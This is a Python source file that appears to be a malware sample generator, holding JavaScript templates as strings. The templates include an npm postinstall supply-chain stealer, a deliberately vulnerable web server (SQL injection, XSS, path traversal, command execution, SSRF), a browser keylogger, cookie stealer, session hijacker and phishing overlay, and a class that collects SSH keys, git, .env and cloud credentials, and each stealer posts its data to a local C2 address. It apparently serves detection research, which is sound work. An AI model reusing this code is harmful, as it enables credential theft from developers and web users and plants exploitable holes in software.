#!/usr/bin/env python3
"""
JavaScript 样本生成器 - Sample Generator v2.0

功能:
- 供应链投毒 (npm)
- Web 攻击
- 浏览器攻击
- Node.js 恶意模块
- 数据窃取
"""

from .base_generator import BaseGenerator


class JavaScriptGenerator(BaseGenerator):
    """JavaScript 恶意样本生成器"""
    
    ATTACK_TYPES = [
        'supply_chain',         # 供应链投毒
        'web_attack',          # Web 攻击
        'browser_attack',      # 浏览器攻击
        'data_theft',          # 数据窃取
        'crypto_mining',       # 加密货币挖矿
        'backdoor',            # 后门
        'ddos',                # DDoS 攻击
        'keylogger',           # 键盘记录
    ]
    
    def __init__(self, config=None):
        super().__init__(language='javascript', config=config)
    
    def _get_javascript_templates(self) -> dict:
        """获取 JavaScript 模板"""
        return {
            'supply_chain': '''// Supply Chain Attack - JavaScript (Node.js)
// Generated by Sample Generator v2.0
// Attack Type: Supply Chain Poisoning
// MITRE ATT&CK: T1195.002 (Compromise Software Supply Chain)

const fs = require('fs');
const path = require('path');
const { exec } = require('child_process');

// 伪装成正常工具函数
function formatDate(date) {
    return date.toISOString().split('T')[0];
}

function calculateHash(data) {
    const crypto = require('crypto');
    return crypto.createHash('md5').update(data).digest('hex');
}

// 恶意 payload - 在安装时执行
function postinstall() {
    console.log('Setting up package...');
    
    const platform = process.platform;
    const arch = process.arch;
    
    // 收集环境信息
    const envInfo = {
        platform: platform,
        arch: arch,
        nodeVersion: process.version,
        user: process.env.USER || process.env.USERNAME,
        home: process.env.HOME || process.env.USERPROFILE,
    };
    
    // 窃取敏感文件
    const sensitivePaths = [
        path.join(envInfo.home, '.ssh', 'id_rsa'),
        path.join(envInfo.home, '.git-credentials'),
        path.join(envInfo.home, '.npmrc'),
        path.join(process.cwd(), '.env'),
    ];
    
    const stolen = [];
    sensitivePaths.forEach(filePath => {
        if (fs.existsSync(filePath)) {
            const content = fs.readFileSync(filePath, 'utf8');
            stolen.push({
                path: filePath,
                content: content.substring(0, 200)
            });
        }
    });
    
    // 外传数据
    const data = JSON.stringify({
        env: envInfo,
        stolen: stolen,
        timestamp: new Date().toISOString()
    });
    
    const base64Data = Buffer.from(data).toString('base64');
    
    // 发送到 C2 (伪装成分析服务)
    const https = require('https');
    const options = {
        hostname: '127.0.0.1',
        port: 8080,
        path: '/analytics',
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'User-Agent': 'npm-package/1.0.0'
        }
    };
    
    const req = https.request(options, (res) => {
        console.log('Package setup complete');
    });
    
    req.on('error', (e) => {
        // 静默失败
    });
    
    req.write(JSON.stringify({ data: base64Data }));
    req.end();
}

// 在 package.json postinstall 脚本中执行
if (require.main === module) {
    postinstall();
}

module.exports = { formatDate, calculateHash };
''',
            
            'web_attack': '''// Web Attack - JavaScript (Node.js)
// Generated by Sample Generator v2.0
// Attack Type: Web Application Attack
// MITRE ATT&CK: T1190 (Exploit Public-Facing Application)

const http = require('http');
const url = require('url');
const querystring = require('querystring');

// 伪装成正常 Web 服务
function createServer(port) {
    const server = http.createServer((req, res) => {
        const parsedUrl = url.parse(req.url, true);
        
        if (parsedUrl.pathname === '/api/data') {
            handleDataRequest(req, res, parsedUrl.query);
        } else if (parsedUrl.pathname === '/api/upload') {
            handleUploadRequest(req, res);
        } else {
            res.writeHead(404);
            res.end('Not Found');
        }
    });
    
    server.listen(port, () => {
        console.log(`Server running on port ${port}`);
    });
    
    return server;
}

function handleDataRequest(req, res, query) {
    // SQL 注入示例
    const userId = query.id;
    const sql = `SELECT * FROM users WHERE id = '${userId}'`;
    
    // XSS 示例
    const userData = {
        name: query.name || '<script>alert("XSS")</script>',
        email: query.email
    };
    
    res.writeHead(200, { 'Content-Type': 'application/json' });
    res.end(JSON.stringify({ sql, userData }));
}

function handleUploadRequest(req, res) {
    // 文件上传漏洞
    if (req.method === 'POST') {
        let body = '';
        
        req.on('data', chunk => {
            body += chunk.toString();
        });
        
        req.on('end', () => {
            const data = querystring.parse(body);
            
            // 危险的文件路径
            const filePath = data.filename;
            const content = data.content;
            
            // 写入到任意位置
            const fs = require('fs');
            const targetPath = `/tmp/${filePath}`;
            
            try {
                fs.writeFileSync(targetPath, content);
                res.writeHead(200);
                res.end('File uploaded');
            } catch (e) {
                res.writeHead(500);
                res.end('Upload failed');
            }
        });
    }
}

// 命令注入示例
function executeCommand(cmd) {
    const { exec } = require('child_process');
    
    exec(cmd, (error, stdout, stderr) => {
        if (error) {
            console.error(`Error: ${error}`);
            return;
        }
        console.log(`Output: ${stdout}`);
    });
}

// 服务端请求伪造 (SSRF)
function fetchUrl(targetUrl) {
    const parsedUrl = url.parse(targetUrl);
    
    const options = {
        hostname: parsedUrl.hostname,
        port: parsedUrl.port || 80,
        path: parsedUrl.path,
        method: 'GET'
    };
    
    const req = http.request(options, (res) => {
        let data = '';
        res.on('data', chunk => data += chunk);
        res.on('end', () => console.log(data));
    });
    
    req.on('error', (e) => console.error(e));
    req.end();
}

// 启动服务器
if (require.main === module) {
    createServer(3000);
}

module.exports = { createServer, executeCommand, fetchUrl };
''',
            
            'browser_attack': '''// Browser Attack - JavaScript
// Generated by Sample Generator v2.0
// Attack Type: Browser Exploitation
// MITRE ATT&CK: T1189 (Drive-by Compromise)

// 键盘记录器
class Keylogger {
    constructor() {
        this.keys = [];
        this.interval = 5000; // 5 秒发送一次
    }
    
    start() {
        document.addEventListener('keydown', (e) => {
            this.keys.push({
                key: e.key,
                code: e.code,
                timestamp: Date.now(),
                url: window.location.href
            });
            
            // 捕获敏感输入
            if (e.target.tagName === 'INPUT') {
                const inputType = e.target.type;
                const inputName = e.target.name;
                
                if (['password', 'text', 'email'].includes(inputType)) {
                    console.log(`Captured: ${e.target.value}`);
                }
            }
        });
        
        // 定期发送数据
        setInterval(() => this.sendData(), this.interval);
    }
    
    sendData() {
        if (this.keys.length === 0) return;
        
        const data = JSON.stringify(this.keys);
        const base64Data = btoa(data);
        
        // 发送到 C2
        fetch('http://127.0.0.1:8080/keys', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({ keys: base64Data })
        }).catch(() => {});
        
        this.keys = [];
    }
}

// Cookie 窃取器
class CookieStealer {
    constructor() {
        this.domain = window.location.hostname;
    }
    
    steal() {
        const cookies = document.cookie;
        const data = {
            domain: this.domain,
            cookies: cookies,
            url: window.location.href,
            userAgent: navigator.userAgent,
            timestamp: Date.now()
        };
        
        // 发送
        fetch('http://127.0.0.1:8080/cookies', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify(data)
        }).catch(() => {});
        
        return cookies;
    }
}

// 会话劫持
function hijackSession() {
    const sessionData = {
        cookies: document.cookie,
        localStorage: JSON.stringify(localStorage),
        sessionStorage: JSON.stringify(sessionStorage)
    };
    
    fetch('http://127.0.0.1:8080/session', {
        method: 'POST',
        body: JSON.stringify(sessionData)
    });
}

// 钓鱼表单
function createPhishingForm() {
    const form = document.createElement('form');
    form.innerHTML = `
        <h3>Security Verification Required</h3>
        <input type="text" name="username" placeholder="Username" required>
        <input type="password" name="password" placeholder="Password" required>
        <button type="submit">Verify</button>
    `;
    
    form.style.cssText = `
        position: fixed;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        background: white;
        padding: 20px;
        border: 1px solid #ccc;
        box-shadow: 0 0 10px rgba(0,0,0,0.5);
        z-index: 9999;
    `;
    
    form.addEventListener('submit', (e) => {
        e.preventDefault();
        const formData = new FormData(form);
        
        fetch('http://127.0.0.1:8080/phishing', {
            method: 'POST',
            body: formData
        });
        
        form.remove();
    });
    
    document.body.appendChild(form);
}

// 浏览器指纹
function getFingerprint() {
    return {
        screen: `${screen.width}x${screen.height}`,
        colorDepth: screen.colorDepth,
        timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
        language: navigator.language,
        platform: navigator.platform,
        hardwareConcurrency: navigator.hardwareConcurrency,
        deviceMemory: navigator.deviceMemory,
        canvas: getCanvasFingerprint()
    };
}

function getCanvasFingerprint() {
    const canvas = document.createElement('canvas');
    const ctx = canvas.getContext('2d');
    ctx.textBaseline = 'top';
    ctx.font = '14px Arial';
    ctx.fillText('fingerprint', 2, 2);
    return canvas.toDataURL();
}

// 执行
if (typeof window !== 'undefined') {
    // 在浏览器环境中
    const keylogger = new Keylogger();
    keylogger.start();
    
    const cookieStealer = new CookieStealer();
    cookieStealer.steal();
}

module.exports = { Keylogger, CookieStealer, hijackSession, createPhishingForm };
''',
            
            'data_theft': '''// Data Theft - JavaScript (Node.js)
// Generated by Sample Generator v2.0
// Attack Type: Data Theft
// MITRE ATT&CK: T1565 (Data Manipulation)

const fs = require('fs');
const path = require('path');
const os = require('os');

class DataThief {
    constructor() {
        this.homeDir = os.homedir();
        this.collected = [];
    }
    
    // 窃取 SSH 密钥
    stealSSHKeys() {
        const sshDir = path.join(this.homeDir, '.ssh');
        const keys = [];
        
        if (fs.existsSync(sshDir)) {
            const files = fs.readdirSync(sshDir);
            files.forEach(file => {
                if (file.match(/id_(rsa|ed25519|dsa|ecdsa)$/)) {
                    const keyPath = path.join(sshDir, file);
                    const content = fs.readFileSync(keyPath, 'utf8');
                    keys.push({
                        file: file,
                        content: content
                    });
                }
            });
        }
        
        return keys;
    }
    
    // 窃取 Git 凭据
    stealGitCredentials() {
        const gitCredPath = path.join(this.homeDir, '.git-credentials');
        
        if (fs.existsSync(gitCredPath)) {
            const content = fs.readFileSync(gitCredPath, 'utf8');
            return content.split('\\n').filter(line => line.trim());
        }
        
        return [];
    }
    
    // 窃取 .env 文件
    stealEnvFiles() {
        const envFiles = [];
        const searchPaths = [
            process.cwd(),
            path.join(this.homeDir, 'projects'),
            path.join(this.homeDir, 'work'),
        ];
        
        searchPaths.forEach(searchPath => {
            if (fs.existsSync(searchPath)) {
                this.findEnvFiles(searchPath, envFiles);
            }
        });
        
        return envFiles;
    }
    
    findEnvFiles(dir, results) {
        try {
            const files = fs.readdirSync(dir);
            
            files.forEach(file => {
                const fullPath = path.join(dir, file);
                
                if (file === '.env' || file.endsWith('.env')) {
                    const content = fs.readFileSync(fullPath, 'utf8');
                    results.push({
                        path: fullPath,
                        content: content
                    });
                } else {
                    const stat = fs.statSync(fullPath);
                    if (stat.isDirectory()) {
                        this.findEnvFiles(fullPath, results);
                    }
                }
            });
        } catch (e) {
            // 忽略错误
        }
    }
    
    // 窃取云凭据
    stealCloudCredentials() {
        const credentials = [];
        
        // AWS
        const awsDir = path.join(this.homeDir, '.aws');
        if (fs.existsSync(awsDir)) {
            const awsConfig = path.join(awsDir, 'credentials');
            if (fs.existsSync(awsConfig)) {
                credentials.push({
                    type: 'AWS',
                    content: fs.readFileSync(awsConfig, 'utf8')
                });
            }
        }
        
        // GCP
        const gcpPath = path.join(this.homeDir, '.config', 'gcloud');
        if (fs.existsSync(gcpPath)) {
            credentials.push({
                type: 'GCP',
                path: gcpPath
            });
        }
        
        // Azure
        const azurePath = path.join(this.homeDir, '.azure');
        if (fs.existsSync(azurePath)) {
            credentials.push({
                type: 'Azure',
                path: azurePath
            });
        }
        
        return credentials;
    }
    
    // 打包数据
    packageData() {
        return {
            timestamp: new Date().toISOString(),
            hostname: os.hostname(),
            user: os.userInfo().username,
            sshKeys: this.stealSSHKeys(),
            gitCredentials: this.stealGitCredentials(),
            envFiles: this.stealEnvFiles(),
            cloudCredentials: this.stealCloudCredentials()
        };
    }
    
    // 外传
    exfiltrate(data, c2Url = 'http://127.0.0.1:8080/data') {
        const https = require('https');
        const url = require('url');
        
        const parsedUrl = url.parse(c2Url);
        const postData = JSON.stringify(data);
        
        const options = {
            hostname: parsedUrl.hostname,
            port: parsedUrl.port || 80,
            path: parsedUrl.path,
            method: 'POST',
            headers: {
                'Content-Type': 'application/json',
                'Content-Length': Buffer.byteLength(postData)
            }
        };
        
        const req = https.request(options);
        req.write(postData);
        req.end();
    }
}

// 执行
if (require.main === module) {
    const thief = new DataThief();
    const data = thief.packageData();
    
    console.log('Collected data:', JSON.stringify(data, null, 2));
    
    thief.exfiltrate(data);
}

module.exports = { DataThief };
'''
        }
